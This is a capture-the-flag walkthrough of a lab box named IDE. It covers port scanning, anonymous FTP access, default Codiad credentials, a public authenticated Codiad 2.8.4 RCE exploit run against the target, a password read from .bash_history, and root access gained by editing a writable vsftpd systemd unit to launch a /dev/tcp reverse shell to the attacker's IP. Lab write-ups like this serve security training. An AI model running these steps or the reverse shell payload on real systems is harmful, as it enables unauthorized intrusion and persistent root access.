IDE An easy box to polish your enumeration skills!
| Title | IDE |
|---|
| Description | IDE An easy box to polish your enumeration skills |
| Points | 60 |
| Difficulty | Easy |
| Maker | bluestorm, 403Exploit |
Summary
IDE: A misconfiguration in the FTP service exposes sensitive information, which is then used to authenticate to the Codiad service. Codiad is vulnerable to an authenticated remote code execution (RCE). For horizontal privilege escalation, we find another user’s password in a world-readable sensitive file. For vertical privilege escalation, we abuse a sudo permission that allows restarting a service as root.
Enumeration
A misconfiguration in the ftp service, we can logging as anonymous, the 80 port had nothing interesting but the
62337 port had a login panel for Codiad 2.8.4. while we’re are it we’ll also search if the version of this software has any cve’s.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.2.77
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
by logging as anonymous to the ftp service, we retrieve a file named ‘-’:
1
2
3
4
5
| more -
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
|
this tells us 3 things, codiad has a user named john, he uses a default password and there is a user named drac on the system likely.
1
2
3
4
5
6
7
8
9
10
11
| searchsploit codiad
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated) | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4) | multiple/webapps/50474.txt
--------------------------------------------------------------------------------------------- ---------------------------------
|
the version of codiad running on the port 62337 is indeed vulnerable to an authenticated RCE, we first need to find valid credentials, I tried john:password and it worked. a classic default one.
once in we run the exploit, we first copy it to our directory :
1
2
3
4
5
6
7
8
| └─$ searchsploit -m multiple/webapps/49705.py
Exploit: Codiad 2.8.4 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49705
Path: /usr/share/exploitdb/exploits/multiple/webapps/49705.py
Codes: CVE-2018-14009
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/chida/sus/oo/heaven/49705.py
|
and run it, just following the steps :
1
| python3 49705.py http://10.10.143.221:62337/ john password 10.9.2.77 1234 linux
|
we should get a shell as www-data by now :
1
2
3
| id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ide:/var/www/html/codiad/components/filemanager$
|
we need to pivote now and logging as drac, by going to his directory, we find the following interesting information:
1
2
| cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
|
User flag
we ssh as user drac and using the password we found earlier :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| └─$ ssh drac@10.10.143.221
drac@10.10.143.221's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-147-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jul 3 20:12:45 UTC 2025
System load: 0.0 Processes: 110
Usage of /: 49.9% of 8.79GB Users logged in: 0
Memory usage: 42% IP address for ens5: 10.10.143.221
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
69 packages can be updated.
1 update is a security update.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jul 3 19:09:38 2025 from 10.9.2.77
drac@ide:~$ cat user.txt
02930d21a8eb009f6d26361b2d24a466
drac@ide:~$
|
Root flag
what can we run as sudo :
1
2
3
4
5
6
7
| drac@ide:~$ sudo -l
[sudo] password for drac:
Matching Defaults entries for drac on ide:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
|
this looks something we should investigate, the first thing you think of is if we can write to this service, let’s look it up first (it will be named vsftpd.service)
1
2
| drac@ide:~$ locate vsftpd | grep .service
/lib/systemd/system/vsftpd.service
|
and looks like we have write permessions to it.
1
2
3
4
5
6
7
8
9
10
11
12
| [Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=bash -c 'exec bash -i &>/dev/tcp/10.9.2.77/9001 <&1'
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
|
we change the ExecStart to the command above that will give us a reverse shell on 9001, this arguments specifies what commands to be run when starting the service.
you should get a rev shell now on port 9001 as root.
